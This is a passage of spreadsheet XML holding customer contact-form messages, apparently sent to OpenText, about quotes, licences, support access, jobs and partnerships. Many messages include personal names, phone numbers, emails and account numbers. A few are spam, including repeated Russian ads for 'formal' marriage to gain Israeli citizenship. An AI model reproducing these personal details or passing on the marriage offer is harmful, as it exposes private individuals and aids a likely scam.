_x000D_
PN:  S-CPFG2100D1-H    QTY 2_x000D_
Fax Gateway 2100 Modular Fax Gateway  _x000D_
 1T1/E1 SIP/T.38-Advanced Replacement Support for SUID: 60652-12318 &amp; 66862-12318 for the period 11/1/2018 - 10/31/2019 _x000D_
_x000D_
If you could assist me with a quote I would appreciate it.  The End User for this is California Department of Public Health._x000D_
_x000D_
Thank you._x000D_
Matt Tidwell _x000D_
858 444 2955_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>To whom it may concern, _x000D_
I am looking to verify employment for a mutual customer, local office could not share a direct contact _x000D_
_x000D_
thank you in  advance</t>
  </si>
  <si>
    <t>Does HostExplorer 2008 support TLS 1.2?</t>
  </si>
  <si>
    <t>Dear sirs,_x000D_
I would like to know the licensing price of some products and if you have commercial representation in Spain. _x000D_
Cheers</t>
  </si>
  <si>
    <t>I want to know more about your BI Query tool.  I used to use it to query traditional relational databases (Oracle, Teradata, MySQL, Postgres) and want to know if it can connect to AWS/EMR/HIVE data sources.</t>
  </si>
  <si>
    <t>Looking for an option to move our fax service to the cloud</t>
  </si>
  <si>
    <t>Hello, is there a detail version of the Fin 25 report that shows each transaction in detail?</t>
  </si>
  <si>
    <t xml:space="preserve">I have applied for Accounts Payable Specialist jobs in the past. I did notice that whenever I received a "no thank you" email, the job was reposted with a new number and posting date.  I would then just reapply but get a no-thank-you email again.  Now you still have one of these on your career page, yet I am reluctant to appy as I don't believe anything will change._x000D_
_x000D_
As a person with the formal education and some corresponding work experience, I am frustrated as I cannot even get to the interview stage; when I check the job posting, none of the content has changed, so I am at a loss for words._x000D_
_x000D_
If I am missing something, please let me know.  If you wish to consider me for the current posted role, I am sure you have a electronic copy of my resume somewhere.  Thanks._x000D_
</t>
  </si>
  <si>
    <t>Have old EMC account with the given email address.  Could not login so tried "Reset Password".  Got the email, but on trying to save New Password, get "Update password failed" error.</t>
  </si>
  <si>
    <t>Hello, last year our contact for my renewal of maintenance of Livelink licenses was Ms. Selena Leslie sleslie@opentext.com this address is no longer valid. Who will be our representative this time around?</t>
  </si>
  <si>
    <t>Good afternoon_x000D_
_x000D_
A couple of years ago we made the purchase of a Tableau TD2u equipment and a license from Encase Forensics, currently we need to acquire a new equipment and we would like to know how we can buy it directly from you. Previously Mr. Jhon Loayza helped us. Additionally, we would like to know the warranty time of the equipment and how long it would take to get to Bogotá Colombia._x000D_
_x000D_
Thank you very much for your reply</t>
  </si>
  <si>
    <t>Conducting a comparative analysis between Captiva and ILINX, and their ability to convert previously imaged documents (stored as TIFF files) to OCR/ICR enabled PDF files.</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Alain Carpentier from company Olymel SEC (Custoner #3271 PSN:620001415)._x000D_
_x000D_
We are planning to change our iSeries system Power8 for a brand new Power9. Regarding our Tli EDI software ver. 6.04.01, do we have to change or update something? And rearding the pricing… will it be the same?_x000D_
_x000D_
Here is the information regarding the current et the new system:_x000D_
_x000D_
Power 8 S824_x000D_
Processor Feature : EPXE_x000D_
Type/model : 8286-42A_x000D_
CPU : 4 cores actif (41080 CPW)_x000D_
_x000D_
Power 9  S924_x000D_
Processor feature : EPXE_x000D_
Type/model : 9009-42A_x000D_
CPU : 4 cores actif (72752 CPW)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">TrutedLink EDI version :6.04.01_x000D_
My name is Alain Carpentier from company Olymel SEC (Custoner #3271 PSN:620001415)._x000D_
_x000D_
We are planning to change our iSeries system Power8 for a brand new Power9. Regarding our Tli EDI software ver. 6.04.01, do we have to change or update something? And rearding the pricing… will it be the same?_x000D_
_x000D_
Here is the information regarding the current et the new system:_x000D_
_x000D_
Power 8 S824_x000D_
Processor Feature : EPXE_x000D_
Type/model : 8286-42A_x000D_
CPU : 4 cores actif (41080 CPW)_x000D_
_x000D_
Power 9  S924_x000D_
Processor feature : EPXE_x000D_
Type/model : 9009-42A_x000D_
CPU : 4 cores actif (72752 CPW)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Internal file Management system.</t>
  </si>
  <si>
    <t>Looking for more information on Teleform. Would like to get a trial version or some way to test it out.</t>
  </si>
  <si>
    <t>NYS ITS is already a customer/user of Exstream. Looking to get info/demo on the latest capabilities of Interactive (or whatever the current product name is that allows for end-user interaction with a form). I did not have any current contact information for ITS' OpenText representative.</t>
  </si>
  <si>
    <t>Interested in Process Suite project implementation support.</t>
  </si>
  <si>
    <t xml:space="preserve">Government Account Liason </t>
  </si>
  <si>
    <t>Hi, Our dongles are not working and I would like to receive some support with this. _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>While checking database, we get a corrupt index. Whenever I try to remove the corruption by unloading the table, The database session gets closed (Error : 09010 GCI CLO Session Closed) . Its urgent</t>
  </si>
  <si>
    <t xml:space="preserve">I really appreciate and very happy to join your business I want to work to your team </t>
  </si>
  <si>
    <t xml:space="preserve">Possibility to receive application update from Encase 8.06 to Encase 8.07 </t>
  </si>
  <si>
    <t>My company is looking to move it’s fax portfolio online. We have a few questions regarding your service:_x000D_
_x000D_
Are we able to have multiple users who use different emails under one account? If so, how many users is the maximum?_x000D_
_x000D_
Is your software able to be integrated into Microsoft Outlook?_x000D_
_x000D_
Are we able to pay you monthly via invoice as our company does not pay vendors with a credit card?</t>
  </si>
  <si>
    <t>Interested in finding out about the process and costs of engaging professional servers for the OTOM upgrade from 4.1 to Version 16. (my previous inquiry had incorrect phone #)</t>
  </si>
  <si>
    <t>Interested in finding out more about the process/costs of engaging professional services for the upgrade of OTOM from 4.1 to Version 16.</t>
  </si>
  <si>
    <t>Knowledge Base is unavailable</t>
  </si>
  <si>
    <t>I am not able to access knowledge center any more after updating my email address.</t>
  </si>
  <si>
    <t>PO 204840 - The PO was issued to Guidance Software_x000D_
The invoice I received is from Opentext._x000D_
Is Guidance Software the same company as Opentext?_x000D_
I need a W-9 for Opentext._x000D_
_x000D_
I have made several email attempts, however have not received a response.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to update our Encase Forensic software. But your site wont let me. Please advise. </t>
  </si>
  <si>
    <t>Pricing and subscription information for eDocs for 5 person in house legal team.</t>
  </si>
  <si>
    <t>You are good about saying I can opt out of your mailing lists, but it is very unclear where one might do that. At best, I find that irritating.</t>
  </si>
  <si>
    <t>Requesting information about Open Text - specifically interested in learning who the project officer is that you work with at Smithsonian.  Exploring potential to collaborate and purchase via Smithsonian. Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
    We are a leading cloud applications company that builds industry software on top of the Salesforce platform. Many of our customers in the insurance industry are looking for a Customer Communication Management solution that can pull data from our application to generate policy documents, bills, etc. and send them out via various channel._x000D_
_x000D_
 We are looking to explore opportunities to integrate our software with Opentext Exstream / CCM and position an integrated solution to customer and prospect base. I would like to get in touch with the right team in OpenText to explore these possibilities. _x000D_
_x000D_
Thanks._x000D_
_x000D_
Sincerly_x000D_
Nikhil Kodkani_x000D_
Vlocity Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">Where can I obtain renewal pricing for a customer?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Our customer- "Ministry of Economy" is interested in renewing their license. License key: SUID 24116-12172. Can you kindly send us a renewal price quote? if it's possible, please consider our reseller discount._x000D_
Thank you in advance_x000D_
Lihi </t>
  </si>
  <si>
    <t>Please provide with price quote for law office. (1-5 users)</t>
  </si>
  <si>
    <t>We request to be your partner on your SAP solution to Shell Petroleum Development Company, Nigeria. We are currently providing SAP support for Shell, we have been providing competitive services for shell for over twelve (12) years. We look forward to your response. Thank you</t>
  </si>
  <si>
    <t>Dear OpenText  Team,_x000D_
I lead Wipro's Digital practice for Hitech customers, and am based out of Netherlands. I have recently moved to Netherlands, and wanted to connect with the OpenText sales management and alliance team, to discuss on how we can partner together for some of the accounts in my portfolio. Please do get back to me urgently, as there are some active opportunities which I would like to connect on immediately._x000D_
_x000D_
Regards,_x000D_
Amit Kaundinya_x000D_
Contact number - +31-646263998</t>
  </si>
  <si>
    <t>It's a nightmare to joint your support. We have a big  issue with the smart UI and we need the cluster manager to update correctly the environment. We had open a ticket since few weeks now / OTCS Ticket 3973916 Custer management settings_x000D_
_x000D_
Call me back or give me a number to catch someone on this topic.</t>
  </si>
  <si>
    <t xml:space="preserve">dear sir, _x000D_
We use your programm Alchemy to open drawing and documents of our hydrocarburs installations (OZ2) under windows XP, but we insttal a new windows 7, and after that we can not open the Alchemy program. Can you help or send as the new version using windows7. its important because we can do any thing without that programm Alchemy. Thanks and kind regards.   </t>
  </si>
  <si>
    <t xml:space="preserve">Ich bitte um Mitteilung einer Kontaktperson, welche mir persönlich Fragen zum Thema Lizenzierung (hier besonders die Java-Problematik). Bitte Mail-Adresse mitteilen. Vielen Dank. </t>
  </si>
  <si>
    <t>Hi team,_x000D_
_x000D_
I would like to activate My Support activities, due to my new participation in Sabris CZ companies. Based on my manager account, we have had a customer support contract with OpenText and I would like to start learning more about OpenText technology. Could you please provide me an access to "hiden" section like "knowleadge base" etc based on contract between OpenText and Sabris CZ_x000D_
_x000D_
Thank you so much for your answer._x000D_
_x000D_
Best Regards,_x000D_
Josef Kotyza_x000D_
Sabris CZ, s.r.o.</t>
  </si>
  <si>
    <t>aanice很高兴aaaaa</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to SAP CRM Users?_x000D_
_x000D_
We have 10,130  Ready-to- buy leads of SAP CRM Technology Customers Records from UK._x000D_
_x000D_
We can provide Test_x000D_
file without any obligations. let me know your interest on the same_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Support call: 39 60 471. A ticket was raised by one of my colleagues James Pragnell regarding Metastorm BPM7.6SR4 Windows Server 2016 compatibility. I called last week for an update and was informed someone was working on this. Please could we have a response regarding our enquiry. _x000D_
Kind regards,_x000D_
Felicity Smith _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>To know more of the product and its features.. Looking for an archiving solution for Oracle ebusiness suite</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
I have applied for the Senior Counsel position (Ref#: 18408), but unfortunately have not received any response yet._x000D_
_x000D_
I was wondering whether this position is still open and if you have had an opportunity to review my resume. _x000D_
_x000D_
Thank you for your time. I look forward to hearing back. _x000D_
_x000D_
Yours faithfully,_x000D_
Iryna Artiushenko</t>
  </si>
  <si>
    <t xml:space="preserve">RFQ  for MTN Nigeria  deadline tomorrow </t>
  </si>
  <si>
    <t>Need a quotes</t>
  </si>
  <si>
    <t xml:space="preserve">Hello a mutual client of ours are having compatibility issues with the latest version of Acrobat Pro DC and your IRM plugin. Currently we are using a legacy version of Adobe Reader that is compatible but would like to receive a notification when your IRM software supports the latest Acrobat Pro DC. </t>
  </si>
  <si>
    <t>I have a QFINITI Client who will require training. I notice there are no scheduled training sessions and nothing in Australia. What is the bets way to organise training for the call centre agents please? Should it be custom training on the customer site with sufficient notice period? Please advise. Thanks. Kevin</t>
  </si>
  <si>
    <t>Dear Sirs_x000D_
_x000D_
I would like to download the latest version of EnCase Forensic and Portable.  Please assist. _x000D_
_x000D_
Regards_x000D_
Danny</t>
  </si>
  <si>
    <t>Hi,_x000D_
Could you please provide me some information around the pricing for RightFax? We are currently examining our options at bringing Fax to Email services in house and would like to include RightFax in the mix of options._x000D_
_x000D_
Thanks,_x000D_
Adam</t>
  </si>
  <si>
    <t xml:space="preserve">Job opportunity </t>
  </si>
  <si>
    <t>Hi, i am looking for the authorized distributors and resellers for Encase products in Singapore. From our past dealings with Guardian, we were only able to transact with iAnalysis and then now with Bounga Informatics Pte Ltd. As part of our financial governance process, we need to find an alternative party that can give us an alternative for comparison. Please advise if there are currently other distributors/resellers that can provide us with another quotation for works related to Encase Forensics.</t>
  </si>
  <si>
    <t>My name is Henry Matta, I am a Manager at EY and also an EnCE. In the following weeks I will be teaching about Forensic Examination at a client who is eager to grow capabilities of its own. As part of this training, Computer Forensics will be explained. I was wondering if there was a way to get around 10 training licenses for 3 days for this specific objective? As part of the Peruvian team, we have 3 full EnCase dongles as well as 3 Portable Ones. Thanks!</t>
  </si>
  <si>
    <t>A demo of your solution for processes and case management</t>
  </si>
  <si>
    <t>Requesting demo for document management system</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I would like to schedule a training session for OpenText media manager. Please contact me at 215-584-5447 in the US._x000D_
_x000D_
Thanks_x000D_
Anand_x000D_
</t>
  </si>
  <si>
    <t>Need info on upgrading our Rightfax 10 server to version 16.4</t>
  </si>
  <si>
    <t>Reset Password feature is not working</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
I was wondering whether Open Text would possibly have an interest in becoming an Exhibitor at the CeBIT and/or send a speaker over to talk to a European crowd about newest developments in the tech industry?_x000D_
_x000D_
Please do not hesitate to get in touch with me for further information or for scheduling a call._x000D_
_x000D_
All the best,_x000D_
_x000D_
Jules Voss_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I completed the course training on HO Exstream, but did receive a certificate that I completed the training. _x000D_
_x000D_
Can you please provide a document showing the fact I completed the training last week with Pete Karlovosky?_x000D_
_x000D_
Kind Regards,_x000D_
Howard_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a full time Extreme Dialogue staff programmer - if you are aware of any candidates, please let me know. </t>
  </si>
  <si>
    <t>I am trying to register and install Encase on my new forensic machine. Libby Baugher is the one that you guys work with on licensing and so on.</t>
  </si>
  <si>
    <t>My department uses BIRT, which runs in IBM Tririga. We have several BIRT issues to be resolved. We are looking for a help via either training or consulting.</t>
  </si>
  <si>
    <t>I am checking to see if we have support at the Bureau of Labor Statistics.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I would like to get a support account set up for my teammate._x000D_
_x000D_
Jacob Ferguson_x000D_
Jferguson@ncdoj.gov_x000D_
Business Analyst_x000D_
_x000D_
Please let me know if you require more information._x000D_
Thanks,_x000D_
Earl Pridgen</t>
  </si>
  <si>
    <t>Looking for a validated eDMS for Regulatory Affairs and Operations, specifically FDA and eCTD submissions.</t>
  </si>
  <si>
    <t>Hello, my firm utilizes the Easylink product, and we would like to conduct routine due diligence regarding the service. Would someone be able to provide a contact name and email of someone I could reach out to with my specific request? Thank you in advance, Lisa Harris</t>
  </si>
  <si>
    <t>Our business currently uses OpenText Content Server (v16.0.5) as our content management system.    We are looking to broaden our use of Content Server in several areas, the first of which is electronic signatures.    We are an engineering firm located and have a need to electronically sign documents (both signatures and the application of Professional Engineering Seals).    I am interested to know if there are OpenText products that we could add to our setup which would provide these features.</t>
  </si>
  <si>
    <t>Hello I am Chandler Clark. I and Michael Reece are the administrators of your product here at Honeywell FMT Kansas City. I writing this for multiple reasons. One to introduce myself, secondly to obtain a list of all applications you have sold to us, thirdly to find out which ones of those products are Windows 10 compatible, fourthly to obtain a excel sheet of each license we have, lastly to get the points of contact you have had in all regards to Honeywell FMT so that efforts are not being duplicated and to get a good history of the relationship. Please respond via email only at this time because this email is going to over 60 plus engineering tool vendors.</t>
  </si>
  <si>
    <t>Need a license key, replacing Rebecca Strautman (Summers).</t>
  </si>
  <si>
    <t>Tried to get to Product Support but it kept redirecting me to a No Access page even though I have confirmed my email and it says my account has been created</t>
  </si>
  <si>
    <t xml:space="preserve">Hello! _x000D_
I work with the Education Centre for Australia and we are actively looking to place graduates / interns from our Professional Year Program. I saw your company thru the internet and I thought that I should reach out to see if we could help you with your requirement for the Product Support Specialist Positions._x000D_
Hope to hear from you soon! </t>
  </si>
  <si>
    <t>I have a printed manual from OpenText titled "What's new in OpenText Content Server 16.2", which was developed by the OpenText Learning Content Development and Learning Services for training course 3-0177. Is it possible to get this in .pdf format?_x000D_
_x000D_
Thanks, Alex.</t>
  </si>
  <si>
    <t xml:space="preserve">Discuss the evolution of ApplicationXtender. We have owned this product for several years via Jack Henry. We would like to discuss how the product has evolved and talk about licensing needs. </t>
  </si>
  <si>
    <t>I need an orientation &amp; navigation through "OpenText Document Access for SAP Solutions" available courses or documentation</t>
  </si>
  <si>
    <t xml:space="preserve">We need to rebuild the Actuate Server and transfer license file.  What do we need to do to make that happen?  Thanks._x000D_
_x000D_
Jay </t>
  </si>
  <si>
    <t>I have had an account with Actuate and subsequently with OpenText Support, but the system does not seem to recognize my credentials.  We have an urgent ticket that needs to be resolved.  Please correspond by email immediately.</t>
  </si>
  <si>
    <t>OpenText Support portal website does not allow my account to create new tickets.</t>
  </si>
  <si>
    <t>We currently use Rightfax express. We are looking to virtualize and start using SIP. Can we please get a demo copy of the Rightfax virtual SIP solution?</t>
  </si>
  <si>
    <t>Good day to all in OpenText!_x000D_
I'm reaching out because I really believe in your services/support._x000D_
I have previously worked with OpenText with an American co. based in Spain &amp; would be really interested in maybe, expanding or representing your services/support here in Spain &amp; why not, maybe Europe too! As I have noticed it is not as "BIG" as it should be for it's value._x000D_
Feel free to contact me via email/phone to go in to detail incase of interest. If not, I would still like some information on the set up. _x000D_
Thank you very much upfront. _x000D_
Best wishes, LM.</t>
  </si>
  <si>
    <t>I need a quote for our Maintenance renewal.</t>
  </si>
  <si>
    <t>i want to know uri scheme for the rptdesign file._x000D_
like ms excel file has ms excel uri scheme.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello All,_x000D_
_x000D_
I would like to discuss RFQ with you. _x000D_
_x000D_
Best regards,_x000D_
Boyan_x000D_
</t>
  </si>
  <si>
    <t>I am trying to contact your accounts department with regard to an overdue invoice no 6899941for £289.39 which relates to termination fees in respect of a contract for the service of fire extinguishers at Guidance Software, 5th Floor Thames Central, Hatfield Road, Slough, which was due for payment on 4th May 2018. Please can someone contact me urgently on tel: +44 1254 296392 quoting account reference 51782672. Thank you</t>
  </si>
  <si>
    <t>Need access to invoice management system for account 865799</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
ich hatte Sie bereits letzte Woche kontaktiert und sende hiermit noch einmal meine Nachricht, für den Fall, dass diese untergegangen ist. Über eine baldige Rückmeldung würde ich mich sehr freuen. _x000D_
_x000D_
Ich arbeite bei First Living, einem Online-Portal für Premium-Immobilien. Von unseren Kunden (Maklern und Einrichtungsexperten) erhalten wir Texte, die wir auf unserer Website bei den jeweiligen Profilen der Kunden einbauen. Da wir durch die stetig steigende Anzahl von Kunden mittlerweile nicht mehr genug Kapazitäten haben, diese Texte selbst anzufassen, zu optimieren und in unique Content umzuwandeln, sind wir aktuell auf der Suche nach einer Software, die uns diese Arbeit abnehmen kann. _x000D_
_x000D_
Aus diesem Grund bin ich bei der Recherche auf Ihre Textgenerierung aufmerksam geworden und würde mithilfe eines ersten Gesprächs sehr gerne herausfinden, ob Ihre Software uns bei diesem Projekt helfen könnte._x000D_
_x000D_
Hätten Sie evtl. morgen (2.10.) oder am Freitag (5.10.) dafür Zeit?_x000D_
_x000D_
Vielen Dank für eine Rückmeldung._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Alina Boie</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We have been using ENCASE products here at the univeristy for a while and we have just migrated ENCASE to another server, we need access to a new electronic license if possible.  Many thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I would like to book 2 spaces on the course in Reading, UK on the 5th November 2018._x000D_
Please can you confirm that there will be space for 2 delegates and please send a quote so as I can raise the P.O. within my organisation._x000D_
_x000D_
Thank you and Kind Regards_x000D_
Emily_x000D_
_x000D_
Mobile: +447429641858_x000D_
Email: ecapewell@dxc.com</t>
  </si>
  <si>
    <t>Hi_x000D_
I am Linux/VAS (Value Added Services GSM) Specialist._x000D_
Currently I am looking for a contract in Linux, VAS area._x000D_
If You are looking for candidate like me, please contact._x000D_
_x000D_
_x000D_
Please find my profile on LinkedIN._x000D_
_x000D_
Albert_x000D_
+48602206507</t>
  </si>
  <si>
    <t>Hi, _x000D_
could you let me know your services, I need to create a catalog for some of our items. thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
_x000D_
Reference to the above subject , Please Send your Proposal for below _x000D_
_x000D_
•	RightFax fax server software with 01 Channel _x000D_
_x000D_
For more information Please contact Mr. @Asokan Kandasamy | 050-1065100_x000D_
</t>
  </si>
  <si>
    <t>What is the latest version of Vista plus windows client 5.5.0 available that is compatible with Windows 10 ?</t>
  </si>
  <si>
    <t>Request for answer: is that Brava license expired? Because we have an issue about brava to views document on Documentum application.</t>
  </si>
  <si>
    <t>RightFax software servers Intertrust (prefer mailing conversation)</t>
  </si>
  <si>
    <t>RFQ- Encase Upgrade</t>
  </si>
  <si>
    <t>We have an opportunity for the Right Fax Renewal</t>
  </si>
  <si>
    <t>Our client is having a video portal consisting of educational,technical and marketing videos . We want to see how Opentext DAM will be helpful to us in terms of video content storing , publishing and maintaining. We want to change the portal . Hence , could you please provide trial licence for Opentext digital management. Thank you.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
I wanted a hands on training on OpenText modules- Archive server, Content server and directory service.</t>
  </si>
  <si>
    <t>Need acess to MySupport</t>
  </si>
  <si>
    <t>I have changed my PC and needs to transfer my Brava Desktop 7.2 TXL software to my new PC. pls assist.</t>
  </si>
  <si>
    <t>Please fix your resume upload. You only permit Google drive but your app hasn't gone through verification with Google so applicants get an error message saying this app hasn't been verified with Google.  At least provide a secondary firm6of uploading abresumd6.</t>
  </si>
  <si>
    <t>When attempting to change an Easylink account's primary email to sammuel.nichols@mitel.com, it states that email is already in use. However, it is not.</t>
  </si>
  <si>
    <t>Cancel my account</t>
  </si>
  <si>
    <t>Gostaria de cotação de van para envio de arquivos bancários.</t>
  </si>
  <si>
    <t xml:space="preserve">Documents. </t>
  </si>
  <si>
    <t>I used to use a legacy product from a company called Hummingbird that allowed me to explore databases with a gui interface with a backend sql engine.  I'd like to know if that product is still available for purchase for a mac machine.  I just want to purchase a single license so I can get reacquainted with the product.  I work for GE as their Chief Commercial Data Scientist and I continuously evaluate software for my data team._x000D_
_x000D_
thanks_x000D_
_x000D_
Cary</t>
  </si>
  <si>
    <t xml:space="preserve">Request for quote of : Part No: 373-BP-M	, Part Description: Annual Maintenance Brava Enterprise viewer PIN 405094. Kindly share quote at the earliest. Thanks. </t>
  </si>
  <si>
    <t>Женщины СНГ. Вы можете получить Гражданство Израиля. Брак с израильтянином. Можно Формальный. Гарантия 100%. Дорого. Обращаться на почту znakfortune@gmail.com</t>
  </si>
  <si>
    <t>We are MICROSOFT sharepoint service providers in the UAE and have more than 15+ years of industry experience. _x000D_
We have some solutions in sharepoint and would like to discuss about partnering with you on some of your products and bundling the same with our solution_x000D_
_x000D_
Products of interest "OpenText Capture for Microsoft® SharePoint". _x000D_
_x000D_
and also integrating fax content with sharepoint_x000D_
_x000D_
Looking forward to hear from you</t>
  </si>
  <si>
    <t>We are looking for a document management system (or enterprise content management system) to replace our current systems and processes._x000D_
Please contact me at your earliest convenience to discuss our requirements, which products in the opentext suite would be useful, and implementation and support timeframes and costs.</t>
  </si>
  <si>
    <t>Have a nice day, we are a licensed encase customer. Can you send the encase download center link?</t>
  </si>
  <si>
    <t>Сделали ремонт в прихожей и не понимаете, что делать с трубкой домофона? _x000D_
Обратите внимание на НОВИНКУ: _x000D_
Переговорное устройство без трубки и свисающих проводов «УКП-66» _x000D_
 _x000D_
Внимание!!! Данный почтовый ящик не обрабатывается на входящие сообщения!</t>
  </si>
  <si>
    <t>hi_x000D_
want to become partner _x000D_
_x000D_
regards</t>
  </si>
  <si>
    <t>Unable to access the download links, and the knowledge portal (Access Denied) error</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity for Government Data Management Solution </t>
  </si>
  <si>
    <t>I would like to know about the vacancy for my profile.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in DF120 and Mobile phone examination course. I will be very grateful,if you could please send the dates for mentioned course._x000D_
Thank you_x000D_
Felix Taiwo </t>
  </si>
  <si>
    <t>I would like to know about vacancy for the my current profile in OpenText vendor invoice management.</t>
  </si>
  <si>
    <t>dfbsdnrtjnrstn</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
i cant active again my license after format my computer_x000D_
please i need help </t>
  </si>
  <si>
    <t>Ian interested in the jop offer.</t>
  </si>
  <si>
    <t>I am interested in the offer</t>
  </si>
  <si>
    <t>Женщины СНГ. Вы можете получить Гражданство Израиля. Брак. Можно Формальный. Гарантия 100%. Дорого. Обращаться на почту znakfortune@gmail.com</t>
  </si>
  <si>
    <t>Need to transform DJDE printer output to PCL.  Please provide pricing for OpenText Output Transformation.</t>
  </si>
  <si>
    <t>I am one of the Managing Partners at Audere Partners. We are a Management Consulting company focused on operational and organizational improvements and change management. We are looking to partner with an organization that can help our clients with big data, IoT, Manufacturing 4.0 etc. because we believe that traditional Operational/management consulting approaches to issues of efficiency, optimization, productivity etc. won't cut it. If this is something that would be of mutual interest/benefit, then please have someone reach out to me to see if there is merit in having a conversation...thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
We need to implement EDI services to receive and fulfill POs and invoice for Federated Co Op produce sales in Canada. _x000D_
Can you provide a quote for this service?_x000D_
_x000D_
Thank you,_x000D_
Jolene</t>
  </si>
  <si>
    <t xml:space="preserve">We are relocating to a new office and want to incorporate a Electronic Document Management System that Three agencies can utilize Implementation that will consist of document storage, retrieval, indexing, versioning, capture, security, archiving and records management and metadata. </t>
  </si>
  <si>
    <t xml:space="preserve">We’re analyzing to upgrade our tools and wanted to have your advice._x000D_
Please tell us what you need to know from our installation in order to proceed._x000D_
This is the information I have for now. Let me know what else you need for you to proceed and do this upgrade._x000D_
I had a contact for Shelley Clark, but email had been rejected._x000D_
_x000D_
Software:            eDocs _x000D_
Vendor:                OpenText_x000D_
Contract #:          0012056427_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I requested an address change in January by emailing 'gxs-ar_team@opentext.com' customer ID 10199945  . This change was never made.  Please update the bill to address to be  _x000D_
Novolex Hartsville_x000D_
101 E Carolina Ave._x000D_
Hartsville, SC 29550_x000D_
accounts.payable@novolex.com_x000D_
</t>
  </si>
  <si>
    <t>Hi, we are a technical consultancy and work with corporate clients, investment banks and VCs to help them understand the CMS and CRM markets. OpenText comes up frequently, so we would like to learn more about the product and company. This is not for a specific sales opportunity, more of a consultancy partnership. Thanks, Nicolas</t>
  </si>
  <si>
    <t xml:space="preserve">Quote for RightFax Enterprise Suite for Superior Court  Alameda County: 1 year term_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to access support page, but I'm getting an error that permission is denied.  Just created my login a few minutes ago as our previous admin has left the company and I need some assistance with an issue.  _x000D_
Contract number: RC066799_x000D_
SUID:  75871-12248_x000D_
</t>
  </si>
  <si>
    <t>Your website has a loop that is preventing me from purchasing one seat of Brava Desktop as a new customer.  Tried 5 times, entered all contact/ client information, hit purchase, took me back to empty contact page, frustrating</t>
  </si>
  <si>
    <t>Login for Best Buy's portal is blocked. Please provide information to get it unblocked. Thank you.</t>
  </si>
  <si>
    <t>I cannot navigate the KC using the account established for me.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I want to send files to BMO using FTP._x000D_
They require a GXS FTP software._x000D_
How or where can I get it?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Have a nice day._x000D_
_x000D_
Thomas Chollet_x000D_
</t>
  </si>
  <si>
    <t>Trying a second time to arrange a time for a demo of OpenText solutions.  We are looking to implement a DAM solution with our Product Creation Teams.</t>
  </si>
  <si>
    <t>Trying to finalize pricing and contract for channel sales of Content Server Seat licenses for a SaaS application we have developed.  Last contacts were with Patricia Smart and Jennifer Kerr who are apparently no longer with the company.</t>
  </si>
  <si>
    <t>Indicação de uma empresa para conhecer o seu produto 'VIM' que implantamos aqui na SETE. É um produto q indico para usuários SAP, mas que já liguei 3 vezes para vocês e ninguém me retorna.</t>
  </si>
  <si>
    <t>Looking at Enterprise Content Management Systems.</t>
  </si>
  <si>
    <t xml:space="preserve">An die Personalverantwortlichen München/Grasbrunn_x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
OpenText eine weltweit führende Firma mit mehreren 1000 Mitarbeitern. Eine soziale und vorbildliche Firma! Denn ich zietiere "OpenText versteht und wertschätzt die Vielfalt unserer Mitarbeiter"_x000D_
Die Wahrheit scheint leider gravierend anders auszusehen. Mitarbeiter arbeiten bis weit in die Nacht hinein... Zum Teil auch über die in Deutschland erlaubten gesetzlichen Arbeits- und Pausenzeiten hinaus, dabei bekommen Sie anscheinend wenig bis keine Unterstützung und dann nach Jahren der Mitarbeit und Aufopferung nun die Kündigung!_x000D_
Deshalb stellt sich für mich die Frage: WAS sind IHRE Mitarbeiter eigentlich für Sie? Wegwerfprodukte? Verschleißteile? Verbrauchsmaterial?_x000D_
Denken Sie gelegentlich bei Ihren Entscheidungen auch an die Menschen die hinter den Jobs und im selben Zuge hinter Ihrer Firma stehen? Denken Sie an die Familien die betroffen sind? An die Verpflichtungen, die Ihre Mitarbeiter mit dem Job sichern? Wie Schulausbildung, Haus, Auto usw.?_x000D_
Bisher hielt ich Opentext für eine verantwortungsvolle Firma. Aber nach diesen Ereignissen hat sich meine Meinung leider ins Gegenteil gewandelt. Ich werde OpenText definitiv niemanden mehr empfehlen. Egal wie gut ihr Internetauftritt und Ihre Außenwirkung in den Medien erscheinen mag. _x000D_
Denn denken Sie bitte darüber nach! Die "kleinen" Mitarbeiter wie die Vertriebler, Auftragsabwickler, Putzfrauen und Programmierer halten den Betrieb am Laufen! Ohne den Grundstock der „Kleinen“ gäbe es auch keine Geschäftsführung._x000D_
Ich verbleibe. Gruß_x000D_
</t>
  </si>
  <si>
    <t>Need to know if there is any equivalent product available for Vista plus windows client 5.5.0 that is compatible with Windows 10 operating system.</t>
  </si>
  <si>
